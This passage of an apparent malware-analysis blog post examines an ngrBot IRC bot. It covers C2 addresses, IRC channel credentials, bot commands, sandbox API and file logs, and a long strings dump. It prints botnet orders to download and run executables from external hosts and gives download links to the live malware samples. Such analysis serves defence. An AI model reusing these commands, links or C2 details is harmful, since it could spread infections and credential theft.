/&gt;Resolved : [pusikuracbre.com] To [95.211.165.62]&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;95.211.165.62 4949 PASS ngrBot&lt;br /&gt;109.75.176.231 4949 PASS ngrBot&lt;br /&gt;178.33.143.52 4949 PASS ngrBot&lt;br /&gt;ab.0n3mmm.com +666 uses ssl to conect to server&lt;br /&gt;Outgoing connection to remote server: 95.211.165.62 TCP port 666&lt;br /&gt;&lt;br /&gt;Commands:&lt;br /&gt;NAZEL&lt;br /&gt;NAZELup&lt;br /&gt;KOSOMAKYAD&lt;br /&gt;msn.set&lt;br /&gt;msn.int&lt;br /&gt;http.set&lt;br /&gt;http.int&lt;br /&gt;http.inj&lt;br /&gt;mdns&lt;br /&gt;stats&lt;br /&gt;speed&lt;br /&gt;logins&lt;br /&gt;slow&lt;br /&gt;ssyn&lt;br /&gt;stop&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}jgyxjah&lt;br /&gt;USER jgyxjah 0 0 :jgyxjah&lt;br /&gt;&lt;br /&gt;channels:&lt;br /&gt;JOIN #darkfear## PASS redem&lt;br /&gt;Now talking in #darkfear## Pass redem&lt;br /&gt;Topic On: [ #darkfear## ] [ !m on !s -n !mod usbi on !j #d832 !j #b832 !j #u832 ]&lt;br /&gt;Topic By: [ MrDD ]&lt;br /&gt;&lt;br /&gt;Now talking in #d832&lt;br /&gt;Topic On: [ #d832 ] [ !NAZEL http://img104.herosh.com/2012/01/18/318591232.gif E0BC8C7AF95AC4C37D5B9DDA8D09F7E3 ]&lt;br /&gt;Topic By: [ MrDD ]&lt;br /&gt;&lt;br /&gt;Now talking in #b832&lt;br /&gt;Topic On: [ #b832 ] [ !mod bdns on !mdns www.dropbox.com !mdns dropbox.com !mdns 4shared.com !mdns www.4shared.com ]&lt;br /&gt;Topic By: [ MrDDisBack ]&lt;br /&gt;&lt;br /&gt;Now talking in #u832&lt;br /&gt;Topic On: [ #u832 ] [ !NAZELup http://hotfile.com/dl/141636596/b286cc5/MrDD.exe A0D5E99F50E5F5244E5289834FFC7D5A ]&lt;br /&gt;Topic By: [ MrDD ]&lt;br /&gt;&lt;br /&gt;exe files just in case he delete samples from his links:&lt;br /&gt;&lt;a href="http://5932f945.theseforums.com"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.crocko.com/39076129B8CB4F75B1958268A2AA0F32/SexyMama-382423.exe"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3a2d544c.whackyvidz.com"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.crocko.com/EF1248DE93C44C3E8A8C8840426CDCF3/MrDD.exe"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.crocko.com/82C8FFA5CAEC40178A08BFB137F97085/318591232.gif"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://b7ae6797.urlbeat.net"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Here is the bonus all ngrBot strings &lt;br /&gt;all functions like passwd stealing,spreading through alot of online messengers,ddos,botkilling etc&lt;br /&gt;The best option in ngrBot is this :&lt;br /&gt;username&lt;br /&gt;*hackforums.*/member.php&lt;br /&gt;Hackforums IT STEALS HF HECKERS PASSWORDS can u belive this ? lool&lt;br /&gt;Enjoy ngrBot&lt;br /&gt;&lt;br /&gt;&lt;pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"&gt;&lt;code&gt;Processes:&lt;br /&gt;PID    ParentPID    User    Path    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;C:\Documents and Settings\Mes documents\SexyMama-382423.exe    &lt;br /&gt;&lt;br /&gt;Ports:&lt;br /&gt;Port    PID    Type    Path    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;&lt;br /&gt;Explorer Dlls:&lt;br /&gt;DLL Path    Company Name    File Description    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;No changes Found            &lt;br /&gt;&lt;br /&gt;IE Dlls:&lt;br /&gt;DLL Path    Company Name    File Description    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;No changes Found            &lt;br /&gt;&lt;br /&gt;Loaded Drivers:&lt;br /&gt;Driver File    Company Name    Description    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;&lt;br /&gt;Monitored RegKeys&lt;br /&gt;Registry Key    Value    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;&lt;br /&gt;Kernel31 Api Log&lt;br /&gt;    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;***** Installing Hooks *****    &lt;br /&gt;719f74df     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)    &lt;br /&gt;719f80c4     RegOpenKeyExA (Protocol_Catalog9)    &lt;br /&gt;719f777e     RegOpenKeyExA (00000093)    &lt;br /&gt;719f764d     RegOpenKeyExA (Catalog_Entries)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000001)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000002)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000003)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000004)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000005)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000006)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000007)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000008)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000009)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000010)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000011)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000012)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000013)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000014)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000015)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000016)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000017)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000018)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000019)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000020)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000021)    &lt;br /&gt;719f2623     WaitForSingleObject(77c,0)    &lt;br /&gt;719f87c6     RegOpenKeyExA (NameSpace_Catalog5)    &lt;br /&gt;719f777e     RegOpenKeyExA (00000039)    &lt;br /&gt;719f835b     RegOpenKeyExA (Catalog_Entries)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000001)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000002)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000003)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000004)    &lt;br /&gt;719f2623     WaitForSingleObject(774,0)    &lt;br /&gt;719e1af2     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters)    &lt;br /&gt;719e198e     GlobalAlloc()    &lt;br /&gt;7c80b72f     ExitThread()    &lt;br /&gt;7d2454bb     LoadLibraryA(MSVBVM60.DLL )=73370000    &lt;br /&gt;73371c38     GetCommandLineA()    &lt;br /&gt;73372f57     CreateMutex((null))    &lt;br /&gt;7d23eab5     WaitForSingleObject(764,7530)    &lt;br /&gt;733739f4     GetCommandLineA()    &lt;br /&gt;7338d1b3     LoadLibraryA(C:\WINDOWS\system32\VB6FR.DLL)=0    &lt;br /&gt;7337452c     GetVersionExA()    &lt;br /&gt;7337476c     LoadLibraryA(OLEAUT32.DLL)=770e0000    &lt;br /&gt;772370b9     GetVersionExA()    &lt;br /&gt;7723711c     GetCommandLineA()    &lt;br /&gt;7337476c     LoadLibraryA(SXS.DLL)=77210000    &lt;br /&gt;774efa66     LoadLibraryA(oleaut32.dll)=770e0000    &lt;br /&gt;73376792     RegOpenKeyA (HKLM\SOFTWARE\Microsoft\VBA\Monitors)    &lt;br /&gt;77daeff6     RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\VBA\Monitors)    &lt;br /&gt;733a304a     GetVersionExA()    &lt;br /&gt;7337a15b     LoadLibraryA(KERNEL32)=7c800000    &lt;br /&gt;7345d09c     CreateFileA(C:\Documents and Settings\SexyMama-382423.exe)    &lt;br /&gt;7337a15b     LoadLibraryA(msvbvm60)=73370000    &lt;br /&gt;7345d34f     ReadFile()    &lt;br /&gt;770fc957     LoadLibraryA(C:\WINDOWS\system32\kernel32.dll)=7c800000    &lt;br /&gt;7337a15b     LoadLibraryA(user32)=7e390000    &lt;br /&gt;7c8165b3     WaitForSingleObject(74c,64)    &lt;br /&gt;7c8191f8     LoadLibraryA(advapi32.dll)=77da0000    &lt;br /&gt;28014c     WriteProcessMemory(h=754,len=400)    &lt;br /&gt;28014c     WriteProcessMemory(h=754,len=10000)    &lt;br /&gt;28014c     WriteProcessMemory(h=754,len=3800)    &lt;br /&gt;28014c     WriteProcessMemory(h=754,len=2000)    &lt;br /&gt;28014c     WriteProcessMemory(h=754,len=1e00)    &lt;br /&gt;28014c     WriteProcessMemory(h=754,len=4)    &lt;br /&gt;7337a4c5     GetCurrentProcessId()=1720    &lt;br /&gt;7337bdfa     RegOpenKeyExA (HKLM\Software\Microsoft\Windows)    &lt;br /&gt;7337be1c     RegOpenKeyExA (HTML Help)    &lt;br /&gt;7337be1c     RegOpenKeyExA (Help)    &lt;br /&gt;7337c9ce     WaitForSingleObject(7e4,ffffffff)    &lt;br /&gt;73373657     ExitProcess()    &lt;br /&gt;***** Injected Process Terminated *****    &lt;br /&gt;&lt;br /&gt;DirwatchData&lt;br /&gt;    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;WatchDir Initilized OK    &lt;br /&gt;Watching C:\DOCUME~1\LOCALS~1\Temp    &lt;br /&gt;Watching C:\WINDOWS    &lt;br /&gt;Watching C:\Program Files    &lt;br /&gt;Modifed: C:\WINDOWS\SoftwareDistribution\DataStore\DataStore.edb    &lt;br /&gt;Modifed: C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.chk    &lt;br /&gt;Deteled: C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb    &lt;br /&gt;Modifed: C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log    &lt;br /&gt;Created: C:\WINDOWS\Prefetch\SEXYMAMA-382423.EXE-0B3EC77E.pf    &lt;br /&gt;Modifed: C:\WINDOWS\Prefetch\SEXYMAMA-382423.EXE-0B3EC77E.pf    &lt;br /&gt;Created: C:\DOCUME~1\LOCALS~1\Temp\JET6FC3.tmp    &lt;br /&gt;Created: C:\DOCUME~1\LOCALS~1\Temp\JET1A.tmp    &lt;br /&gt;Deteled: C:\DOCUME~1\LOCALS~1\Temp\JET1A.tmp    &lt;br /&gt;Deteled: C:\DOCUME~1\LOCALS~1\Temp\JET6FC3.tmp    &lt;br /&gt;File: SexyMama-382423.exe&lt;br /&gt;Size: 158386 Bytes&lt;br /&gt;MD5: 284AC2DF706657EF31ECBB59E7563698&lt;br /&gt;Packer: File not found&lt;br /&gt;&lt;br /&gt;File Properties: CompanyName      #&amp;quot;$&amp;quot;a&lt;br /&gt;FileDescription  fwk34&lt;br /&gt;FileVersion      3.34.0132&lt;br /&gt;InternalName     ASFa&lt;br /&gt;LegalCopyright   &lt;br /&gt;OriginalFilename ASK3.exe&lt;br /&gt;ProductName      La!ly&lt;br /&gt;ProductVersion   &lt;br /&gt;&lt;br /&gt;Exploit Signatures:&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;Scanning for 19 signatures&lt;br /&gt;Scan Complete: 316Kb in 0,016 seconds&lt;br /&gt;Urls&lt;br /&gt;--------------------------------------------------&lt;br /&gt;http://%s/%s&lt;br /&gt;http://%s/&lt;br /&gt;http://&lt;br /&gt;http://api.wipmania.com/ftp://%s:%s@%s:%d&lt;br /&gt;&lt;br /&gt;RegKeys&lt;br /&gt;--------------------------------------------------&lt;br /&gt;gdatasoftware.&lt;br /&gt;sunbeltsoftware.&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Policies\System&lt;br /&gt;.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;&lt;br /&gt;ExeRefs&lt;br /&gt;--------------------------------------------------&lt;br /&gt;File: SexyMama-382423_dmp.exe_&lt;br /&gt;.exe&lt;br /&gt;%windir%\system32\cmd.exe&lt;br /&gt;&amp;amp;&amp;amp;%%windir%%\explorer.exe %%cd%%%s&lt;br /&gt;%0x.exe&lt;br /&gt;Internet Explorer\1explore.exe&lt;br /&gt;pidgin.exe&lt;br /&gt;wlcomm.exe&lt;br /&gt;msnmsgr.exe&lt;br /&gt;msmsgs.exe&lt;br /&gt;opera.exe&lt;br /&gt;chrome.exe&lt;br /&gt;ieuser.exe&lt;br /&gt;1explore.exe&lt;br /&gt;f1refox.exe&lt;br /&gt;.ipconfig.exe&lt;br /&gt;verclsid.exe&lt;br /&gt;regedit.exe&lt;br /&gt;rundll32.exe&lt;br /&gt;cmd.exe&lt;br /&gt;regsvr32.exe&lt;br /&gt;.exe&lt;br /&gt;lol.exe&lt;br /&gt;winlogon.exe&lt;br /&gt;explorer.exe&lt;br /&gt;y%s\%s.exe&lt;br /&gt;lsass.exe&lt;br /&gt;&lt;br /&gt;Raw Strings:&lt;br /&gt;--------------------------------------------------&lt;br /&gt;File: SexyMama-382423_dmp.exe_&lt;br /&gt;MD5:  0152bd6046d860acdfe21abc5438eac2&lt;br /&gt;Size: 323586&lt;br /&gt;&lt;br /&gt;Ascii Strings:&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;!This program cannot be run in DOS mode.&lt;br /&gt;Rich:&lt;br /&gt;.text&lt;br /&gt;`.rdata&lt;br /&gt;@.data&lt;br /&gt;.reloc&lt;br /&gt;WPVS&lt;br /&gt;t1hh&lt;br /&gt;_[^]&lt;br /&gt;t-hP&lt;br /&gt;QRPWV&lt;br /&gt;RPQWV&lt;br /&gt;QRPSV&lt;br /&gt;txVhD&lt;br /&gt;uaVhD&lt;br /&gt;QRPSV&lt;br /&gt;SVW3&lt;br /&gt;u3h0&lt;br /&gt;u!hh&lt;br /&gt;h,eA&lt;br /&gt;u3h0&lt;br /&gt;u!hP&lt;br /&gt;h,eA&lt;br /&gt;PQRV&lt;br /&gt;RPQW&lt;br /&gt;u:WhD&lt;br /&gt;u#WhD&lt;br /&gt;QRPW&lt;br /&gt;RPQV&lt;br /&gt;RPQV&lt;br /&gt;PQRV&lt;br /&gt;RPQW&lt;br /&gt;RSSh&lt;br /&gt;vG9u&lt;br /&gt;t0WSV&lt;br /&gt;WVRj&lt;br /&gt;WSPQR&lt;br /&gt;vt9u&lt;br /&gt;t0WSV&lt;br /&gt;WVRj&lt;br /&gt;WSPQR&lt;br /&gt;gfff&lt;br /&gt;WVRj&lt;br /&gt;PWQR&lt;br /&gt;u3h0&lt;br /&gt;u!hh&lt;br /&gt;h,eA&lt;br /&gt;u3h0&lt;br /&gt;u!hP&lt;br /&gt;h,eA&lt;br /&gt;&amp;gt;CAL &lt;br /&gt;uGh4&lt;br /&gt;u5hHqA&lt;br /&gt;hHqA&lt;br /&gt;=MSG t&lt;br /&gt;=SDG &lt;br /&gt;&amp;gt;MSG u`&lt;br /&gt;h4eA&lt;br /&gt;Wh4eA&lt;br /&gt;h4eA&lt;br /&gt;SVW3&lt;br /&gt;SVW3&lt;br /&gt;9:vP&lt;br /&gt;G;9r&lt;br /&gt;@W;F&lt;br /&gt;Wj h&lt;br /&gt;t&amp;amp;j,j&lt;br /&gt;Wjdj&lt;br /&gt;F4VP&lt;br /&gt;SWf9&lt;br /&gt;t-f;&lt;br /&gt;t=hH&lt;br /&gt;_^[]&lt;br /&gt;&amp;#124;04+~4&lt;br /&gt;_^[]&lt;br /&gt;SVWP3&lt;br /&gt;QWSVR&lt;br /&gt;QPRWS&lt;br /&gt;RPQS&lt;br /&gt;WQRV&lt;br /&gt;_^[]&lt;br /&gt;_^[]&lt;br /&gt;h8}C&lt;br /&gt;Vh(&amp;#124;C&lt;br /&gt;un9F&lt;br /&gt;t2j h&lt;br /&gt;L9_@vI&lt;br /&gt;;_@r&lt;br /&gt;h(&amp;#124;C&lt;br /&gt;h(&amp;#124;C&lt;br /&gt;h(&amp;#124;C&lt;br /&gt;WVPQR&lt;br /&gt;SQRj&lt;br /&gt;STFU&lt;br /&gt;A8j@&lt;br /&gt;QWRPV&lt;br /&gt;B0QPV&lt;br /&gt;=tzA&lt;br /&gt;PQRj&lt;br /&gt;PQRj&lt;br /&gt;SVWh&lt;br /&gt;STFU&lt;br /&gt;h(&amp;#124;C&lt;br /&gt;Vh@P@&lt;br /&gt;h,}C&lt;br /&gt;L9^8vE&lt;br /&gt;;^8r&lt;br /&gt;hpP@&lt;br /&gt;STFU&lt;br /&gt;PL9^(v^&lt;br /&gt;;^(r&lt;br /&gt;9~0v/&lt;br /&gt;;~0r&lt;br /&gt;9^8v;&lt;br /&gt;;^8r&lt;br /&gt;9^@v2&lt;br /&gt;;^@r&lt;br /&gt;tu9]&lt;br /&gt;RVWPQ&lt;br /&gt;uXWV&lt;br /&gt;QVWRP&lt;br /&gt;u$WP&lt;br /&gt;E$_^[&lt;br /&gt;tpVW&lt;br /&gt;uTVW&lt;br /&gt;E$_^[&lt;br /&gt;E$^[&lt;br /&gt;E$_^[&lt;br /&gt;h,eA&lt;br /&gt;h,eA&lt;br /&gt;QVWhP&lt;br /&gt;h,eA&lt;br /&gt;VWhP&lt;br /&gt;h,eA&lt;br /&gt;95hVA&lt;br /&gt;QVht&lt;br /&gt;8POST&lt;br /&gt;tWWV&lt;br /&gt;PQWj&lt;br /&gt;Ph$eA&lt;br /&gt;RPQVW&lt;br /&gt;Ph$eA&lt;br /&gt;RPQVW&lt;br /&gt;WVRPS&lt;br /&gt;u h(&lt;br /&gt;QWRS&lt;br /&gt;SVWh&lt;br /&gt;SVW3&lt;br /&gt;QhDeA&lt;br /&gt;VWQh4&lt;br /&gt;t&amp;quot;j V&lt;br /&gt;SVWh&lt;br /&gt;=USERt&lt;br /&gt;=PASS&lt;br /&gt;:Uu#Vh&lt;br /&gt;8Pu.&lt;br /&gt;=FEATt&lt;br /&gt;=TYPEt&lt;br /&gt;=PASVu&lt;br /&gt;=STATt&lt;br /&gt;=LISTu&lt;br /&gt;uuhh&lt;br /&gt;ucWVh&lt;br /&gt;95LeA&lt;br /&gt;RPQh&lt;br /&gt;PQRh&lt;br /&gt;QRPh&lt;br /&gt;QVh:&lt;br /&gt;Rh~f&lt;br /&gt;_[^]&lt;br /&gt;_[^]&lt;br /&gt;F/PQ&lt;br /&gt;~(WR&lt;br /&gt;T0(RW&lt;br /&gt;t=VW&lt;br /&gt;Qh~f&lt;br /&gt;u4SV&lt;br /&gt;W$RP&lt;br /&gt;tmQh&lt;br /&gt;RSSh&lt;br /&gt;t,PVQ&lt;br /&gt;O,@PQ&lt;br /&gt;TSVW3&lt;br /&gt;WWWWh&lt;br /&gt;F4RP&lt;br /&gt;LSVW3&lt;br /&gt;^&amp;lt;^[&lt;br /&gt;V4QR&lt;br /&gt;vJ9^,u&lt;br /&gt;;F8v&lt;br /&gt;N4PQ&lt;br /&gt;F4RP&lt;br /&gt;F@@PR&lt;br /&gt;F,BRP&lt;br /&gt;u-SSV&lt;br /&gt;RSWWj&lt;br /&gt;8httpu1&lt;br /&gt;u$8H&lt;br /&gt;Ph,eA&lt;br /&gt;QRVP&lt;br /&gt;RVPQ&lt;br /&gt;Ph,eA&lt;br /&gt;QRVP&lt;br /&gt;RVPQ&lt;br /&gt;Qh~f&lt;br /&gt;SVWP&lt;br /&gt;Rh~f&lt;br /&gt;hh)A&lt;br /&gt;h`)A&lt;br /&gt;tlWP&lt;br /&gt;Ph$`A&lt;br /&gt;PhX`A&lt;br /&gt;tlWP&lt;br /&gt;Rh~f&lt;br /&gt;_^[]&lt;br /&gt;hp_A&lt;br /&gt;SVWj&lt;br /&gt;_^Yj&lt;br /&gt;QPPPPh&lt;br /&gt;h(*A&lt;br /&gt;SVWj,&lt;br /&gt;Vj\P&lt;br /&gt;[@^]&lt;br /&gt;Vj.P&lt;br /&gt;[@^]&lt;br /&gt;QRRj&lt;br /&gt;RRRRf&lt;br /&gt;[_^]&lt;br /&gt;SVWh&lt;br /&gt;@h\XA&lt;br /&gt;Ph\XA&lt;br /&gt;PhDjA&lt;br /&gt;h0*A&lt;br /&gt;h\XA&lt;br /&gt;h\XA&lt;br /&gt;*t2:&lt;br /&gt;VhH*A&lt;br /&gt;Qh4*A&lt;br /&gt;QSV3&lt;br /&gt;95LYA&lt;br /&gt;j Ph4XA&lt;br /&gt;h`*A&lt;br /&gt;Vj#S&lt;br /&gt;_^[]&lt;br /&gt;Wj*P&lt;br /&gt;^[_]&lt;br /&gt;h0+A&lt;br /&gt;h$+A&lt;br /&gt;SVWh&lt;br /&gt;VVVV&lt;br /&gt;WWVS&lt;br /&gt;SVW3&lt;br /&gt;RVh-&lt;br /&gt;@PVj&lt;br /&gt;PVh-&lt;br /&gt;VhH+A&lt;br /&gt;SVW3&lt;br /&gt;@PVj&lt;br /&gt;RVj&amp;quot;W&lt;br /&gt;hT+A&lt;br /&gt;hT+A&lt;br /&gt;h&amp;#124;+A&lt;br /&gt;ht+A&lt;br /&gt;Rhh+A&lt;br /&gt;QhX+A&lt;br /&gt;@PVR&lt;br /&gt;Wj j+V&lt;br /&gt;&amp;lt;%u2&lt;br /&gt;VVVV&lt;br /&gt;h\XA&lt;br /&gt;h\XA&lt;br /&gt;SVWh&lt;br /&gt;Rh(jA&lt;br /&gt;QRPu&lt;br /&gt;PQRu&lt;br /&gt;h ,A&lt;br /&gt;Phd^A&lt;br /&gt;PPhP^A&lt;br /&gt;9Q@w&lt;br /&gt;h\XA&lt;br /&gt;hTXA&lt;br /&gt;Php^A&lt;br /&gt;8nu8h&lt;br /&gt;Rhp^A&lt;br /&gt;Qhp^A&lt;br /&gt;hTXA&lt;br /&gt;Rhp^A&lt;br /&gt;8nu8h&lt;br /&gt;hTXA&lt;br /&gt;h@YA&lt;br /&gt;PVRQh&lt;br /&gt;PQRVh&lt;br /&gt;RQPh&lt;br /&gt;PQRSh&lt;br /&gt;8_^[&lt;br /&gt;ufh &lt;br /&gt;h(YA&lt;br /&gt;Rhp^A&lt;br /&gt;hTXA&lt;br /&gt;Rhp^A&lt;br /&gt;hTXA&lt;br /&gt;h&amp;#124;,A&lt;br /&gt;h&amp;#124;,A&lt;br /&gt;hx,A&lt;br /&gt;hx,A&lt;br /&gt;Rh8aA&lt;br /&gt;hp,A&lt;br /&gt;hd,A&lt;br /&gt;8httpuM&lt;br /&gt;8:uE&lt;br /&gt;u&amp;gt;8P&lt;br /&gt;PhD,A&lt;br /&gt;$_^[&lt;br /&gt; _^[&lt;br /&gt;h@,A&lt;br /&gt;hhaA&lt;br /&gt;QRPh4,A&lt;br /&gt;h,YA&lt;br /&gt;h$YA&lt;br /&gt;h&amp;lt;YA&lt;br /&gt;QRPh4,A&lt;br /&gt;h4YA&lt;br /&gt;RPQh4,A&lt;br /&gt;SVWh&lt;br /&gt;8#t&amp;quot;&lt;br /&gt;RVWP&lt;br /&gt;SVWR&lt;br /&gt;hx,A&lt;br /&gt;hx,A&lt;br /&gt;PQhp^A&lt;br /&gt;Phd^A&lt;br /&gt;QRhp^A&lt;br /&gt;SVW3&lt;br /&gt;h -A&lt;br /&gt;h\XA&lt;br /&gt;PVh\XA&lt;br /&gt;t&amp;quot;h&amp;lt;-A&lt;br /&gt;t&amp;quot;h0-A&lt;br /&gt;Vh0dA&lt;br /&gt;u5h(-A&lt;br /&gt;VhDdA&lt;br /&gt;VhddA&lt;br /&gt;h$eA&lt;br /&gt;h,eA&lt;br /&gt;h0eA&lt;br /&gt;{h4eA&lt;br /&gt;MhDeA&lt;br /&gt;,h8eA&lt;br /&gt;t)h0u&lt;br /&gt;SVW3&lt;br /&gt;RPhD-A&lt;br /&gt;QRPh&lt;br /&gt;QRPh&lt;br /&gt;PQRh&lt;br /&gt;PhPcA&lt;br /&gt;PRhhbA&lt;br /&gt;QRPh0_A&lt;br /&gt;SVW3&lt;br /&gt;tRh&amp;#124;,A&lt;br /&gt;uBPh&lt;br /&gt;h -A&lt;br /&gt;PWQRh,bA&lt;br /&gt;SPQh&lt;br /&gt;PSRh&lt;br /&gt;PQhPcA&lt;br /&gt;PhhbA&lt;br /&gt;hx,A&lt;br /&gt;tqCh&lt;br /&gt;s[h5&lt;br /&gt;h\XA&lt;br /&gt;Ph\XA&lt;br /&gt;PhDjA&lt;br /&gt;=XjA&lt;br /&gt;hhXA&lt;br /&gt;ht.A&lt;br /&gt;SWhl.A&lt;br /&gt;hd.A&lt;br /&gt;h&amp;#124;XA&lt;br /&gt;h&amp;#124;XA&lt;br /&gt;Ph&amp;#124;XA&lt;br /&gt;t'j j&lt;br /&gt;h&amp;lt;.A&lt;br /&gt;tgh &lt;br /&gt;h46A&lt;br /&gt;SVWh&lt;br /&gt;hx,A&lt;br /&gt;Rh$6A&lt;br /&gt;h\/A&lt;br /&gt;h\/A&lt;br /&gt;tb@Ph&lt;br /&gt;Rhd/A&lt;br /&gt;;&amp;lt; t&lt;br /&gt;SVW3&lt;br /&gt;Wh00A&lt;br /&gt;h 0A&lt;br /&gt;5djA&lt;br /&gt;5pjA&lt;br /&gt;5&amp;#124;jA&lt;br /&gt;95djA&lt;br /&gt;6`jA&lt;br /&gt;taVW&lt;br /&gt;h@0A&lt;br /&gt;hD0A&lt;br /&gt;Ph&amp;#124;`A&lt;br /&gt;&amp;#124;Sj 3&lt;br /&gt;tlSSSSSSSSSShL0A&lt;br /&gt;h\XA&lt;br /&gt;Ph\XA&lt;br /&gt;Phd0A&lt;br /&gt;tU&amp;lt; u&lt;br /&gt;u2Wh&lt;br /&gt;h(3A&lt;br /&gt;hT+A&lt;br /&gt;hT+A&lt;br /&gt;SVWh&lt;br /&gt;hT+A&lt;br /&gt;h,3A&lt;br /&gt;u.h,3A&lt;br /&gt;SVWh&lt;br /&gt;RhP3A&lt;br /&gt;PVQR&lt;br /&gt;Qh8eA&lt;br /&gt;h@3A&lt;br /&gt;;SDG &lt;br /&gt;8SDG &lt;br /&gt;h,3A&lt;br /&gt;Qhx3A&lt;br /&gt;RPhl3A&lt;br /&gt;QRhT3A&lt;br /&gt;t!WV&lt;br /&gt;_^[]&lt;br /&gt;hhXA&lt;br /&gt;h\XA&lt;br /&gt;Ph\XA&lt;br /&gt;hl.A&lt;br /&gt;hd.A&lt;br /&gt;hl.A&lt;br /&gt;hd.A&lt;br /&gt;hhnA&lt;br /&gt;h(5A&lt;br /&gt;t!h85A&lt;br /&gt;uyhP&lt;br /&gt;u^hP&lt;br /&gt;_^t)&lt;br /&gt;9&amp;#124;:~&lt;br /&gt;:~+w:~&lt;br /&gt;tK@boL@&lt;br /&gt;L@iBK@&lt;br /&gt;%s.%s&lt;br /&gt;pdef&lt;br /&gt;%s.%S&lt;br /&gt;%s.Blocked &amp;quot;%s&amp;quot; from removing our bot file!&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from removing our bot file!&lt;br /&gt;block&lt;br /&gt;bdns&lt;br /&gt;CreateFileW&lt;br /&gt;0123456789ABCDEF&lt;br /&gt;i.root-servers.org&lt;br /&gt;%s.Blocked &amp;quot;%s&amp;quot; from moving our bot file&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from moving our bot file&lt;br /&gt;%s.p10-&amp;gt; Message hijacked!&lt;br /&gt;%s.p10-&amp;gt; Message to %s hijacked!&lt;br /&gt;%s.p21-&amp;gt; Message hijacked!&lt;br /&gt;msnmsg&lt;br /&gt;msnint&lt;br /&gt;baddr&lt;br /&gt;X-MMS-IM-Format:&lt;br /&gt;CAL %d %256s&lt;br /&gt;msnu&lt;br /&gt;Done frst&lt;br /&gt;ngr-&amp;gt;blocksize: %d&lt;br /&gt;block_size: %d&lt;br /&gt;NtFreeVirtualMemory&lt;br /&gt;NtAllocateVirtualMemory&lt;br /&gt;NtQuerySystemInformation&lt;br /&gt;LdrEnumerateLoadedModules&lt;br /&gt;NtQueryInformationProcess&lt;br /&gt;LdrGetProcedureAddress&lt;br /&gt;NtQueryVirtualMemory&lt;br /&gt;LdrLoadDll&lt;br /&gt;NtQueryInformationThread&lt;br /&gt;LdrGetDllHandle&lt;br /&gt;RtlAnsiStringToUnicodeString&lt;br /&gt;\\.\pipe\%s&lt;br /&gt;kernel32.dll&lt;br /&gt;GetNativeSystemInfo&lt;br /&gt;%s_%d&lt;br /&gt;%s_0&lt;br /&gt;%s-Mutex&lt;br /&gt;SeDebugPrivilege&lt;br /&gt;ntdll.dll&lt;br /&gt;NtGetNextProcess&lt;br /&gt;%s-pid&lt;br /&gt;%s-comm&lt;br /&gt;NtResumeThread&lt;br /&gt;PONG &lt;br /&gt;JOIN #&lt;br /&gt;PRIVMSG #&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from creating &amp;quot;%S&amp;quot;&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from creating &amp;quot;%S&amp;quot; - &amp;quot;%s&amp;quot; will be removed at reboot!&lt;br /&gt;.exe&lt;br /&gt;%s.Detected process &amp;quot;%S&amp;quot; sending an IRC packet to server %s:%d.&lt;br /&gt;%s.Detected process &amp;quot;%S&amp;quot; sending an IRC packet to server %s:%d (Target: 